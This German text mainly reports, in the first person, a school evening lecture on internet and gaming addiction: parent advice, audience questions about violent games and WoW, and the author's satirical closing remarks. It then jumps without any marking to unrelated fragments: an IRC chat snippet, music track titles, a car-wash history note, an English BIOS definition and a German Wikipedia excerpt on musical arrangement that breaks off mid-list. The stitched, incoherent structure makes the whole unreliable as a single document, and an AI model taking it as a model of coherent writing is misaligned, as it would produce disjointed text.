"D.h. so lang drumrumreden bis der Jugendliche einsehen muss 'Ja,
hasch' ja recht.' foerdert haeufig die Kontrabildung - also die
Widerstandsbildung."

4. Lassen Sie sich nicht provozieren.
"Wenn's um 'n Thema geht, dass der Erwachsene problematisch findet,
der Jugendliche nicht."

5. Sprechen Sie ihren Umgang mit Suchtmitteln offen an.
"Macht auch in dem Zusammenhang Sinn wenn's um Sucht geht. Macht
ja nichts anderes aus zu sagen 'Ich bin erwachsen.'."

6. Lassen sie Informationen einfliessen, ohne ein "Expertengespraech"
   zu beginnen

7. Steuern sie ein gemeinsames Ziel an

Quelle: Ueber Drogen reden, BzgA

Nun erscheint eine Folie mit dem Text:
"Bei Fragen wenden sie sich an eine (online)Beratungsstelle!"

Daraufhin zeigt er die Website "http://snp.bpb.de/" im Firefox.

Anschliessend verweist er auf einige weiterfuehrende Literatur und
auf viele Links.

Dann stellt der Moderator noch irgend eine Frage bzgl. Gewaltspielen,
deren genauer Wortlaut mir allerdings entgangen ist, woraufhin Herr
Durner meint, Verbote im Internet seien gar nicht so sinnvoll, "weil
man das ja weltweit aufrufen kann".

"Natuerlich klar, Thema Gewaltspiele ist immer aktuell. Es gibt hier
auch Elternbroschueren zu dem Thema vom kopaed-Verlag. Die koennte ich
Ihnen fuer 50 Cent das Stueck ueberlassen." Er wedelt mit einer gruenen
Broschuere.

[...]

"Problematisch isses natuerlich, wenn einer schon negative Voraussetzungen
mitbringt - eine Praeferenz fuer Gewalt. Der findet natuerlich genau das
in Gewaltspielen wieder."

[...]

"Und wenn die Kinder besonders jung sind..."

Der Moderator ergreift das Wort: "Ok, gibt's aus'm Saal fragen?"
"Ich komm' gerne mit'm Mikro an die entsprechende Stelle."

Die erste Frage aus dem Publikum lautet (gekuerzt): "Also zunaechst
wuerd' ich gerne paar Beispiele hoeren ueber Gewaltspiele; die haben
Sie naemlich gar nich' erwaehnt. Und ausserdem wird heute taeglich
acht Stunden mit Computern gearbeitet. Also jeder Erwachsene sitzt davor,
handelt bei eBay und so, [...] und trotzdem wird den Kindern erzaehlt
es ist boese."

Durner stimmt zu dass "jemand der bis 18 keinen Computer beruehrt
hat keine Arbeitsstelle finden" wuerde.
Beispiele fuer Gewaltspiele habe er bewusst aus dem Vortrag herausge-
lassen, da sein Thema Internetsucht sei, und die Debatte ueber Gewalt-
spiele meist sehr hitzig und daher sehr kontraer sei. "Koennen wir
gerne hier auch fuehren, ist aber nicht mein Hauptthema. [...] Es
gibt Counter Strike, es gibt sogenannte Ego-Shooter. Also auch auf
dieser Internetseite snp.bpb.de koennen Sie Beispiele finden."

Die naechste Person aus dem Publikum hat gehoert, "dass Spieler nur
dann Gewaltspiele spielen, wenn in ihrem Gehirn das Zentrum fuer
Mitleid fehle", und hat in Durners Vortrag eine Beschaeftigung mit
dieser These vermisst.
Durner aeussert, dass er Gehirnforschung "sehr kritisch" sehe.
"Man hat andere Mittel und andere Grenzen - aber die sind nicht
zu vergleichen mit realer Gewalt. Also es gibt ein Buch von
Herrn Spitzer [sp?]. Das Buch ist sehr polemisch. Da heisst es
wirklich: Computerspiele machen fett, dumm, asozial. Deswegen:
Mit Hirnregionen kann ich nicht bestaetigen. Deswegen finde
ich das mit der Hirnforschung sehr kritisch. Das ist mit der
Hirnforschung alleine nicht zu erklaeren. Da sind psychische
Prozesse auch noch im Spiel. Auch emotionale."

Die naechste Frage lautet: "Noch zu den 12-Jaehrigen. Es hiess,
dass die keine Gewaltspiele spielen sollen. Aber die sind doch indi-
ziert. wissen Sie wie die da dann 'rankommen koennen?"
Durner nennt aeltere, z.B. 16-jaehrige Brueder oder Cousins als
Beispiele fuer Bezugsquellen solcher Spiele.
Frage aus dem Publikum: "Darf der mit 16 das schon haben?"
- "Das ist so bei der freiwilligen Selbstkontrolle. Es gibt Spiele,
die sind mit 16 schon freigegeben."
Als weitere Bezugsquelle nennt er Bekanntschaften, und "ueber's
Internet natuerlich. Jemand, der sich einigermassen auskennt, kriegt
ueber's Internet illegal jegliches Spiel der Welt. Mit saemtlichen
Patches. Mit noch mehr Blut und Gedaerm."

Naechste Frage: "Ich find' es sehr schwer wenn man vorher Zeiten fuer
die Nutzung vereinbart - sehr schwer mit Vertrauen und Kontrolle - was ist
ueberhaupt eine altersgerechte Nutzungszeit? [...] So wie sie's erklaert
haben - wenn die erstmal in nem Level drin sind, dann... [...] Wenn ich
vorher eine Zeit vereinbart habe... gibt's 'nen Programm dass wenn ich
diese Zeit verbraucht habe, also kumuliert auf drei Tage, gibt's eine
Software, womit sich dann nach drei Tagen der Computer automatisch 'run-
terfaehrt?"

Durner bejaht die Existenz einer solchen Software, z.B. "parents-friend.de".
Damit sei auch "Jugendschutz" und "voellige Kontrolle" moeglich. Allerdings
fuehre der Einsatz solcher Software meist dazu, dass die Kinder versuchen
diese zu umgehen - was meistens zu Hardwaredefekten fuehre.
Es koenne keine endgueltige Loesung sein, so eine Sperre als 'praeventives
Mittel' einzubauen und nicht mehr zu kommunizieren.

Die naechste Frage lautet in etwa: "Sind nicht Angststoerungen und
Depressionen die tatsaechliche Ursache? Greifen diese Leute nicht nur deswegen zu
Computern, um diese Probleme zu kompensieren?"

Durner antwortet: "Risikofaktoren wie Angststoerungen und Depressionen
beguenstigen das natuerlich. Es kann als Ausloeser einer kompensativen
Stoerung entstehen. Und sowas muss behandelt werden, das ist klar.
[...]
Ich bin bei Prop e.V. in der Beratungsstelle, und da ist es oft so
dass es eine doppelte Sucht gibt. Und dass die Sucht quasi nur die
Auswirkung ist von einer tiefer liegenden Stoerung."


Naechster Beitrag aus dem Publikum: "[...] Vorher hatten wir vereinbart
'eine halbe Stunde pro Tag'. [...] Ich weiss aber nicht, in welchen
Levels der ist."

[Grosse Teile dieser Frage sowie die Antwort darauf habe ich leider
nicht mitprotokolliert. :-( ]

Der naechste Fragesteller spricht die Problematik des 'Reizes des
Verbotenen' an: "Ein 11-jaehriger, der muss unbedingt an ein Spiel
ab 16 ''rankommen. Wie sollen die Eltern damit umgehen, [...] dass
Kinder genau diese verbotenen Sachen haben wollen?"

Durner stimmt zu, dass Verbote wie die von Beckstein geforderten die
Auswirkung haben, "dass es um so interessanter wird".
"Aber mit Kommunikation und elterlicher Praesenz geht da schon einiges."
"Sie kommunizieren mit dem Jugendlichen und schauen sich an, was dabei
fehlt."

Ein weiterer Beitrag aus dem Publikum thematisiert die Problematik,
dass Gewalthandlungen in Spielen nicht immer auf den ersten Blick
ersichtlich seien. "Ich hatte meinem Kind mal aus Versehen ein
Gamecube-Spiel gekauft. Das heisst Turok. Da ging's um Dinojagd.
[...] Dann stellte ich irgendwann mal fest, dass da eine Urwald-
szene war, wo ein Urwalddorf war, wo sich Menschen mit Waffen
gegenseitig abgeknallt haben.

Durner erwidert, dass es in der Tat nicht reiche, das 'Titelblatt'
zu sehen, um "zu sehen was man eigetlich" kaufe.

Die naechste Frage aus dem Publikum lautet: "Wenn man jetzt den
Eindruck hat, dass der Jugendliche suechtig ist - bleibt da was
anderes ausser dass ich zum Psychiater gehe?"
Sie habe zwar keine eigenen Kinder, aber trainiere eine Handball-
mannschaft. [Oder war sie die Frau von einem Freund von einem
Trainer der Handballmannschaft? Habe ich leider nicht genau
mitgekriegt.]
"Und da ist einer in der Gruppe, der laesst Trainings ausfallen
schon und so."
Auf Durners Rat hin, "unter Umstaenden mit den Eltern" Kontakt
aufzunehmen, erwidert die Fragestellerin, dass die Mutter "da
nicht so sei".
Durner: "Die andere Moeglichkeit waere noch Prop e.V., also unsere
Dienste. [...] Koennten Sie mal unverbindlich anbieten ob sich
der junge Herr da mal bei uns vorstellt. [...] Also ich bin
Medienpaedagoge, kenn' mich da ganz gut aus. Und mir sagen diese
Spiele auch was."
- "Ja, er spielt dieses Warcraft, wo er Schultern [?] und so
erwirbt. Und Halskrausen."

Der naechste Beitrag aus dem Publikum:
"Sie sagen heute aus, dass die Leute, die so viel vor dem PC haengen,
suechtig sind, und zeigen hier ein Bild, wie man ueber die goldenen
Regeln wie man ueber Drogen redet. Ich fuehle mich jetzt wie ein Drogen-
suechtiger. Ich fuehle mich wie eine Person die suechtig ist nach
Drogen - genau! Ich check' das nicht! Ich fuehl' mich abgestempelt
wie einer, der Drogen nimmt. [...]
Also ich bin mit 12 an den Computer 'rangekommen, und ich hab' den
Computer noch nie verlassen. Wenn ich nach Hause komme, mach' ich
den Computer an, und erst abends wieder aus. Ich hab' mich mit 12 mit
Filesharing beschaeftigt - also da ist wirklich alles drin. Also
Pornographie und Mordszenen, man kriegt alles. Also da hat man auch
irgendwie ein Machtgefuehl.
Aber ich fuehle mich bisschen verarscht, weil ich mich mit Leuten
eingestuft fuehle, die Drogensuechtig sind."

Durner: "Ich habe jetzt nicht gesagt, dass _du_ drogensuechtig bist.
Die Sucht ist aber aehnlich wie eine Drogensucht. Es gibt etwas, was
du immer brauchst. Ohne das du nicht leben kannst. Und es gibt ja
verschiedene Handlungssuechte. Wie die Esssucht. Und die Spielsucht.
Und Kaufsucht. Und all das sind Suechte. Und so gibt es auch die
Computersucht und die Internetsucht. Noch dazu: Die Zeit, die man
im Internet verbringt, ist kein Indiz. Das ist ein Faktor von vielen."

Die Person aus dem Publikum erwidert: "Also ich sitze echt viel
vor'm Computer, aber ich hab' trotzdem meine Freunde - ich geh'
am Wochenende weg. Aber trotzdem... ich bin in der evangelischen
Kirche aktiv. Aber trotzdem... ich bin nicht... ich bin nicht suechtig.
Ok, vielleicht bin ich's. [Kurze Pause.] Aber ich lasse mich trotzdem
nicht als fett und asozial bezeichnen. [...]
Ich weiss gar nicht, was ich machen soll. Uns Jugendlichen - wenn ich
kein Musikinstrument spiele, oder nicht sportlich bin, was soll ich machen?
Was wird uns angeboten? Wenn's mal regnet - was koennen wir dann machen?
Uns mit Freunden treffen, ok. Aber es wird echt zu wenig angeboten, also...
ja, ich geb' mal wieder ab."

Durner: "Also mir gehts genau so: Ich finde es auch dumm, wenn jemand
sagt, Computerspiele machen fett und asozial. Ich spiele auch schon
seit Jahren. Aber ich bevorzuge reale Kontakte. [...] Wenn mir jemand
im ICQ schreibt 'Lass uns mal ein Bierchen trinken', dann mache ich
das natuerlich auch. Wenn jemand Sozialkontakte nicht hat, dann wird's
kritisch."
Gerade fuer Zwoelfjaehrige sei es extrem wichtig, "seine realen Erfahrungen
zu machen".
"Trotzdem gibt's eben Bereiche, die kritisch sind, und die muss man auch
beachten."

Auf eine Frage zum Thema Kinderpornographie antwortet Durner, es
sei natuerlich auch ein Problem, wenn Beschraenkungen _nur_ mit
"solchen Tools" moeglich seien: "Wenn der Jugendliche das umgehen
kann, kann er sich alles holen. Das ist ein Problem. Es bedarf
elterlicher Kontrolle. [...] Ich hab deswegen nichts drueber gesagt,
weil ich in meinem Vortrag keine Kinderpornographie haben moechte."

Die naechste befragte Person erkundigt sich nach Richtlinien, wie
viel Computernutzung man seinem Kind erlauben sollte.
Durner antwortet, es haenge "ganz vom Individuum ab".
"Also jemandem, der mehr spielen kann und will... dem sollte man...
Moment, ganz kurz. [Er trinkt ein paar Schlucke Apfelschorle]
Also, mit einer zeitlichen Begrenzung ist es nicht getan. Es
gibt vereinzelt irgend welche Grobrichtlinien. Ich weiss nicht,
ob das jetzt hier drin ist. [Er blaettert in einer der Broschueren.]
Irgendwo hab ich's gelesen, ja. Aber das ist nur so eine Grob-
richtlinie. Nach der man nicht gehen kann. Wenn Sie sagen 'sechs
Stunden pro Woche, hier steht es drin', wird das fuer den Jugend-
lichen kein Argument sein."

Eine weitere Frage: "Wie schaut's aus mit anderen Suechten? Also
wenn man onlinesuechtig ist, kommt man da schnell in's Rauchen und
Trinken rein?"

Durner: "Also was zusammenhaengen kann, ist Nikotinsucht und PC-Sucht.
Es wurde aber wenig untersucht. [...] Jemand, der intensiv in einem
Klan spielt, der muss wach sein. Der muss fit sein. Also kann es sein,
dass er Aufputschmittel nimmt. Aber es gibt keine Untersuchungen."

Frage: "Folgendes: Ich habe frueher mal den Herrn der Ringe in einer
Woche am Stueck durchgelesen. Dann haben mir die Augen gebrannt und
ich war muede. Da hat aber auch keiner gesagt ich haette eine Lese-
sucht. [...] Ist es nicht etwas Jugendtypisches? Isses nicht etwas
Jugendtypisches auch an einer FSK zu ruetteln? Ich kann mich
auch erinnern dass ich mal nachts aufgestanden bin und auch Sachen
angeschaut habe, die ich nicht durfte. Ist es nicht etwas voellig
Normales?"

Durner aeussert, "es gehoeren noch mehrere Faktoren dazu". Meistens
sei es eben der Neuigkeitsgrad eines Spieles, der fesselt. Bei World
of Warcraft sei es so, dass es woechentlich, oder gar noch oefter,
aktualisiert werde. "Es wird permanent aktualisiert. Das heisst das
Spiel ist nie 'zu Ende'. Daher ist das natuerlich ein Faktor, der so
bindet. Das heisst, der Bua kommt gar nimmer davon weg."

Der naechste Fragesteller, moechte wissen, ob es Untersuchungen zum
Altersspektrum von World-of-Warcraft-Spielern gebe. "Das spielen ja
sicher nicht nur Jugendliche."

Durner schuettelt den Kopf. "Ist mir keine Untersuchung bekannt, wie
das Altersspektrum aussieht. Aber mir ist auch bekannt dass die Alters-
struktur nicht rein jugendtypisch ist." [...]
Es gebe Leute, "die sind hocherfolgreich. In dem Spiel. Aber in der
Realitaet nicht. Weil mit 16-17 Stunden am Tag - da kann ich keinen
Job erfuellen."

Jemand im Publikum erwidert, dass es aber eben sehr wohl professionelle
Spieler in China und Japan gebe, die damit Unmengen an Geld verdienen.

Durner scheint diesen Einwand zu ignorieren und meint: "Aber das ist
ein Problem, dass sich die Leute schwer verschulden. Sie haben dann
nichts zu Essen. Das ist eine Krankheit."

Dann wird thematisiert, dass durchaus auch "ganze Familien" gemeinsam
viel Zeit vor dem PC verbringen. Durner: "Bei World of Warcraft hab ich
schon gehoert, dass da die komplette Familie davor sitzt. Also zwei
Eltern, zwei Kinder. Und dementsprechend dann das 'Gerangel' losgeht.
Also ich weiss nicht, ob dann jeder in seinem Zimmer sitzt. Und sie
zusammen Abenteuer bestehen. Aber: Es gibt auch bei erwachsenen Menschen
WoW-Spieler."

Naechste Frage aus dem Publikum: "Gibt es auch 'Passivspielen'? Also
ich kenne eine, die setzt sich zu ihrem Freund, setzt sich daneben
und schaut zu."

Durner: "Hm... Passive Computersucht.. hm..."
[Gelaechter im Publikum]

Eine Person aus dem Publikum ergaenzt, dass auf diese Weise auch Verbote
durch die Eltern umgangen werden koennen: "Wenn ich es ihm verbiete,
geht er halt zum Freund, und spielt dort weiter. Oder guckt zu."

Durner raet, sich in diesem Fall an die Eltern des Freundes zu wenden.
"Andererseits sehen sie ja auch, wie viele Stunden das Kind bei seinem
Freund verbringt. Und ich glaube, wenn man die ganze Zeit nur passiv
zuschaut, dann macht das auf die Dauer keinen Spass."

Eine andere Person aus dem Publikum bringt ein, dass Spiele wie World
of Warcraft, bei denen man einen monatlichen Betrag bezahlen muss um
spielen zu koennen, die Sucht ggf. verstaerken koennen, da man wenn
man dafuer Geld bezahlen muss mehr spielt, um das Gefuehl zu haben,
man bekomme was fuer den ausgegebenen Betrag: "Ich hatte einen Klassen
kameraden, der ist jetzt 21. Der hat monatelang die Schule geschwaenzt,
und 1000 Euro in seinen Rechner reingesteckt, um WoW zu spielen. Er
konnte [dank Flatrate-Tarif] rund um die Uhr ins Internet reinschauen
und WoW spielen." 

Durner stimmt zu: "Frueher, als man noch Minutenpreise [fuer den
Internetzugang] gezahlt hat, hat man sich das mehrfach ueberlegt,
ob man noch bissel rumsurft. Aehnlich ist das mit so einem Account
Wenn man dafuer Geld zahlt, muss man ihn natuerlich auch nutzen."

Weiterer Beitrag aus dem Publikum: "Es gibt doch andere Bereiche,
wo man [als Elternteil] selber einen gewissen Hang zur Sucht zeigt.
Nehmen wir als uebertriebenes Beispiel mal einen Kaninchenzuechter-
verein. Wenn einem das Kind vorwirft: 'Du verbringst mehr Zeit im
Kaninchenzuechterverein als bei uns.', dann ist es schwer, dem Kind
Internetsucht vorzuwerfen."

Durner stimmt zu, dass dies ein Problem sein kann.

Der Moderator stellt nochmals die Frage, wie viele Stunden ein Kind denn
nun genau im Internet sein duerfe.
Durner hat daraufhin die Idee, da er schon mal einen Vortrag bzw. Workshop
fuer das Lehrerkollegium veranstaltet hat, demnaechst "einen Workshop fuer
Eltern an der Schule zu veranstalten. Dass wir uns in den Computerraum
reinsetzen, und uns die Spiele anschauen. Um die Begeisterung nachvoll-
ziehen zu koennen."

Daraufhin stelle ich selbst noch einige Fragen, die ich aber leider nicht
mitprotokolliert habe. Fuer viele der von mir angesprochenen Themen gab
es vorab oder waehrend des Vortrages (dank Internet per UMTS) umfassende
Anregungen von guten Bekannten bzw. Freunden aus dem Internet Relay Chat
(von denen ich viele desoefteren auch real treffe und mich hervorragend
mit ihnen verstehe), die ich aufgreife. Z.B. spreche ich an, dass
intensive Computernutzung nicht automatisch dazu fuehrt, dass die realen
Sozialkontakte sich verringern, sondern dass das Internet ungemeine
Chancen bietet, neue Kontakte herzustellen, und zwar nicht wie bei
Kontakten die im realen Leben beginnen, sehr stark oertlich beschraenkt,
sondern sogar internationale Kontakte sehr einfach moeglich sind. Vor
allem fuer soziale Randgruppen (jemand anders aus dem Publikum nennt
hierzu z.B. homosexuelle Personen als Beispiel, ich nenne zudem noch
Leute, die in der Schule oder im sonstigen Umfeld 'gemobbt' werden)
sei es meiner Ansicht nach sehr viel leichter oder gar anfangs ueber-
haupt nur moeglich, Kontakte 'virtuell' zu beginnen, denn auf diese
Weise kann man zwangslaeufig zunaechst nicht nach 'aeusseren Faktoren'
wie Aussehen oder Verhalten beurteilt werden, sondern rein nach dem,
was man selber auf gedanklicher Ebene preisgibt. Daher besteht Potenzial,
Kontakte zu finden, die ohne diese 'Virtualitaet' nie moeglich gewesen
waeren, die dann aber eben sehr oft auch real weitergefuehrt werden.

Durner stimmt zu, dass das Internet hier viele Moeglichkeiten bietet,
meint aber auch, dass viele virtuelle Kontakte nicht zu realen werden,
und dass es auch ein Problem darstellt, dass jeder eben nur genau das
vom Gegenueber erfaehrt, was dieser selber erzaehlt. "Wenn man z.B.
bei fs-location.de schaut, was die Leute so von sich schreiben, da steht
so viel Muell drin..."
Ich erwidere, dass man natuerlich einen guten 'Filter' braucht, um bei
jeglicher Information im Internet einschaetzen zu koennen, was
davon wahrscheinlich 'real' ist, und was wirklich 'Muell' und z.B.
eine offensichtliche Luege ist; und hier helfen meiner Ansicht nach
absolut keine automatisierten technischen Loesungen, sondern das eigene
Gehirn muss die 'Filter'-Funktion uebernehmen. Und dazu ist es meiner
Ansicht nach unerlaesslich, sich intensiv mit dem Medium Internet zu
befassen, da man solche Urteilsfaehigkeit nur durch staendige und zeitlich
ausgedehnte Auseinandersetzung damit erlernt bzw. ausbaut.

Etwa um 21:45 endet die Diskussionsrunde. Durner wird gefragt, ob er
"vielleicht noch ein Abschlusswort"  haette, das er dem Publikum mit-
geben moechte. Er ueberlegt kurz und meint: "Gar nicht. Also so was
richtig Bedeutungsschwangeres: Gar nicht. Also vielen Dank."

Nach einem kurzen Applaus beginnen die Zuschauer, die Schule zu verlassen.
Ich unterhalte mich draussen noch mit einem vermeintlich 'virtuellen'
Bekannten, den ich waehrend des Vortrags zum ersten Mal in Person sah,
mit dem ich aber vorher schon intensive Gespraeche im Internet Relay
Chat fuehrte, und wir uns dementsprechend auch IRL auf Anhieb gut
verstanden.

Meine Kevlar-Weste hat uebrigens wohl keinen all zu sehr gestoert
oder beunruhigt, auch wenn ein Freund und meine Mutter vorab energisch
versuchten mir diese Kleidungswahl auszureden, da "ich dann nicht
serioes wirke" bzw. "die Leute Angst vor mir" haetten. Ich bin jedenfalls
selbst absoluter Pazifist und verabscheue Gewalt, und trug die Weste
rein aus symbolischem Selbstschutz vor ach-so-gefaehrlichen Schuelern:
Als satirische Referenz auf die gaengige Polemik "Computerspiele
machen Jugendliche zu Amoklaeufern".

Mein eigenes Schlusswort zum Vortrag - im Gegensatz zu Herrn Durner bin
ich willig, mir eines aus den Fingern zu saugen:

Da es in unserer kaputten Gesellschaft absolut normal und sogar anerkannt
und gewuerdigt ist, Probleme zu verdraengen statt den Ursachen auf den
Grund zu gehen, neigen viele Leute dazu, den schwarzen Peter fuer soziale
Probleme einfach leblosen Kisten zuzuschieben. Es ist total out, ueberhaupt
nach den tiefgruendigen Wurzeln der Probleme zu suchen, geschweige denn
weitreichende positive Veraenderungen unserer Gesellschaftsstruktur zu
erwirken. Vor allem beim Bildungssystem in unserem Jammerland laeuft
sehr viel schief. Aber es ist halt viel einfacher und kurzfristig
'gewinnbringender', vor allem fuer Demagogen, viel zu naheliegende
engstirnige polemische Schuldzuweisungen zu betreiben.

'Deus ex machina' war frueher mal. 'Der Teufel im Kasten' ist 'in'.

wide__820x461__desktop.jpeg

[12:20:12] <s0lfunk> mh
[15:33:33] <s0lfunk> Jetzt bin Ich zum Großteil auf fester Milch.
[15:33:37] <s0lfunk> Kaffeeweißer ;-)
[15:33:51] <s0lfunk> Bist du Tot?
[15:34:07] <s0lfunk> *MÄMÄ*
[15:34:22] <s0lfunk> Gib mir ein S
[15:34:24] <s0lfunk> Gib mir ein O
[15:34:26] <s0lfunk> Gib mir ein P
[15:34:28] <s0lfunk> Gib mir ein H
[15:34:30] <s0lfunk> Gib mir ein I
[15:34:32] <s0lfunk> Gib mir ein E

Alles Party oder was
=> Ganz nach dem Motto: Sehen & Gesehen werden.

Tomorrowland Belgium 2018

AlexTC - Angel in the sky [Pop Version]

AleXTC - Angel in the sky [Radio Edit]

Scooter x Harris & Ford - God save the Rave

Damals: 1962 - Die erste Waschanlage. Die Augsburger Unternehmer Gebhard Weigele und Johann Suzberger meldeten 1962 die weltweit erste "selbsttätige Waschanlage für Kraftfahrzeuge" zum Patent an. 1964 folgte die erste vollautomatische Waschstraße.10.09.2012

BIOS Basic Input Output System

BIOS (basic input/output system)
Posted by: Margaret Rouse WhatIs.com
bios-wp-pd.png

BIOS (basic input/output system) is the program a personal computer's microprocessor uses to get the computer system started after you turn it on. It also manages data flow between the computer's operating system and attached devices such as the hard disk, video adapter, keyboard, mouse and printer.

BIOS is an integral part of your computer and comes with it when you bring it home. (In contrast, the operating system can either be pre-installed by the manufacturer or vendor or installed by the user.) BIOS is a program that is made accessible to the microprocessor on an erasable programmable read-only memory (EPROM) chip. When you turn on your computer, the microprocessor passes control to the BIOS program, which is always located at the same place on EPROM.

When BIOS boots up (starts up) your computer, it first determines whether all of the attachments are in place and operational and then it loads the operating system (or key parts of it) into your computer's random access memory (RAM) from your hard disk or diskette drive.

With BIOS, your operating system and its applications are freed from having to understand exact details (such as hardware addresses) about the attached input/output devices. When device details change, only the BIOS program needs to be changed. Sometimes this change can be made during your system setup. In any case, neither your operating system or any applications you use need to be changed.

Although BIOS is theoretically always the intermediary between the microprocessor and I/O device control information and data flow, in some cases, BIOS can arrange for data to flow directly to memory from devices (such as video cards) that require faster data flow to be effective. This was last updated in August 2014

Flashskes Musik allerlei Weiterfuehrung...

DJSpaceCourt - The Universe

https://de.wikipedia.org/wiki/Arrangement
Arrangement Zur Navigation springen Zur Suche springen Der Titel dieses Artikels ist mehrdeutig. Weitere Bedeutungen sind unter Arrangement (Begriffsklärung) aufgeführt.

Durch ein Arrangement wird in der Musik ein oftmals urheberrechtlich geschütztes Musikwerk mit Hilfe musikalischer oder technischer Gestaltungsmittel in seiner ursprünglichen Ausdrucksform verändert. Arrangeur ist die Person, die derartige Arrangements durchführt. Daneben existiert auch die Bezeichnung Orchestrator, dessen Tätigkeitsfeld meist auf größer besetzte orchestrale Werke abzielt. Inhaltsverzeichnis

   1 Allgemeines
   2 Gestaltungsmittel
       2.1 Musikalisch
       2.2 Technisch
   3 Geschichte
   4 Arrangement im Jazz
   5 Arrangement in Pop- und Rockmusik
   6 Funktion
   7 Abgrenzungen
   8 Rechtsfragen
   9 Literatur
   10 Weblinks
   11 Einzelnachweise

Allgemeines

In der klassischen Musik verlangt heutzutage die sog. Werktreue eine originalgetreue Wiedergabe der Partituren, selbst für geringfügige Neugestaltungen ist dadurch kein Raum. Die Werktreue verleiht den Werken einen sicheren Wiedererkennungswert, ohne Rücksicht darauf, welches Sinfonieorchester oder Ensemble sie spielt. Aber selbst bei strengen Partituren bedarf die Realisierung des Werkes doch der Interpretation durch Musiker und Sänger und damit der ästhetischen Auslegung der Noten, auch wenn die Grenzen eng gesetzt sind.[1] Arrangements sind somit eine besondere Form der Interpretation und die Abweichung von der Partitur des Originals durch musikalische Gestaltungsmittel.[2] Arrangements als Form der Werkinterpretation gibt es daher heutzutage meist nur bei anderen Musikstilen, insbesondere in Jazz-, Popmusik und Rockmusik. Die Arrangements des 19. Jahrhunderts oder Schönbergs Verein für musikalische Privataufführungen sind allerdings Beispiele für weitverbreitete historische Praxis von Arrangements klassischer Musik.

Als Arrangement wird nur die Neugestaltung eines Originals verstanden. Nicht unerwähnt bleiben soll, dass – auch in der klassischen Musik – Komponisten oft auf Arrangeure zurückgegriffen hatten, weil sie nicht selbst arrangieren wollten oder konnten. Das Arrangement ist eine für den Bereich der populären Musik typische kreative Erscheinung.[3] Die Skala des Arrangements reicht hier vom gelegentlichen Eingriff bis hin zu einer vollständigen Neugestaltung des Originals.[4]

Die Art der (Neu-)Einrichtung eines Musikstücks bzw. die Bearbeitung[5] kann dabei sehr unterschiedlich sein:

   Der Inhalt des Originals bleibt erhalten wie etwa bei der Umschreibung (Transkription) einer Komposition für eine andere Besetzung.
   Teile des Originals oder verschiedene Originalkompositionen werden zu einer neuen Reihenfolge zusammengestellt und gegebenenfalls mit zusätzlich komponierten Überleitungen verbunden wie bei Suiten, Potpourris oder Medleys von beliebten Melodien eines bestimmten Themenkreises.

Gestaltungsmittel

Der Stellenwert des Arrangements kann anhand der Bestandteile einer Komposition abgelesen werden. Eine Komposition besteht aus Primärkomponenten (Melodik, Rhythmik, Harmonik und Form) und Sekundärkomponenten (Arrangement, Interpretation und Aufnahmetechnik). Für Arrangements stehen dem Arrangeur musikalische und/oder technische Gestaltungsmittel zur Verfügung. Von ihnen kann er eines oder mehrere beim Arrangement betonen, andere wiederum ignorieren. Die Gestaltungsmittel bestehen insbesondere aus anderen Instrumentierungen, Reharmonisierungen oder Modulationen.[2] Musikalisch

Für ein anderes Arrangement stehen dieselben Gestaltungsmittel zur Verfügung, die auch der Komponist bei der Gestaltung seines Originalwerkes anwenden kann. Zu den musikalischen Gestaltungsmitteln gehören Besetzung, Melodik, Harmonik, Rhythmik, Metrik, Tempo, Phrasierung, Artikulierung, Ornamentik, Kadenz oder Periodik. Technisch

Technische Gestaltungsmittel kommen im Tonstudio bei der Tonaufnahme selbst oder bei deren Postproduktion zum Einsatz, sie sind Teil der Tongestaltung. Bei der Tonaufnahme selbst können Echo- oder Nachhalleffekte eingesetzt werden, bei der Postproduktion Soundeffekte. Selbst die Abmischung als vorletzter Prozess im Tonstudio kann noch gestalterische Aspekte eines Arrangements enthalten. Geschichte

Die größte Bedeutung kam dem Arrangement in der nicht-orchestralen Musik seit dem 20. Jahrhundert zu. In der späten Renaissance- und der Barockmusik lag schon eine Kürzelschreibweise, wie heute bei den Leadsheets, vor – der Generalbass oder basso continuo. So musste z. B. der Cembalist bei Vivaldi diese Kürzel improvisierend spontan ausspielen, und sie wurden erst später explizit in Noten fixiert, wobei natürlich der Improvisationscharakter verlorenging. Während in der „Klassischen Musik“ die Kunstmusik Note für Note auskomponiert und vom Komponisten instrumentiert wurde – abgesehen z. B. von den Überleitungsteilen der Kadenzen –, geben andere Musikstile der freieren Ausführung oder der Improvisation mehr Raum. Johann Strauss (Sohn) schrieb zwar die Partituren seiner eigenen Kompositionen selbst, er bearbeitete jedoch auch Opern- und Konzertmusik anderer Autoren für seine eigenen Orchester. Insgesamt gibt es von ihm mehr als 500 Arrangements fremder Kompositionen.[6]

Viele im 20. Jahrhundert entstandene Musikstücke – etwa im Blues, Jazz oder Pop, in der Volksmusik und allen davon abgeleiteten Gattungen – geben den ausführenden Musikern oder Sängern größere Freiheit in der Interpretation eines Stückes. Sie erstreckt sich nicht nur auf den Ausdruck, sondern schließt auch notations-technisch relevante Aspekte ein. Stücke aus diesen Bereichen sind oft nur in Melodielinie und Harmoniefolge vorgegeben. Aufgabe des Arrangeurs ist es, aus diesen wenigen Vorgaben ein Arrangement zu machen, das den Musikern genauere Angaben oder Ausführungsmöglichkeiten gibt. Dies kann durch die Erstellung einer Partitur geschehen, durch mündliche Absprachen mit den Musikern oder auch durch Audiobeispiele.

Größere Bedeutung erlangten Arrangements erst im Jazz. Hier wird das geschriebene Arrangement bereits bei den weißen „sinfonischen“ Jazzorchestern wie Paul Whiteman, Leo Reisman oder Jean Goldkette verwendet. Berühmte Arrangeure jener Zeit waren Don Redman (für Fletcher Henderson), Doc Cook (Chicago Jazz) oder Erskine Tate. Die Standardformeln der Big Band-Arrangements wurden von Art Hickman, Bill Challis oder Ferde Grofé gesetzt.[7] Insbesondere Grofé entwickelte für Paul Whiteman die Prinzipien, die in der Swing-Ära ihren Höhepunkt fanden:

   Aufteilung des Orchesters in „Sections“: Bläser, Streicher, Saxophone und Rhythmus;
   diese Sektionen spielen Call and Response oder kontrapunktisch;
   meist improvisierte Soli;
   Ensemblepassagen werden mit dem Feeling improvisierter Soli gespielt.

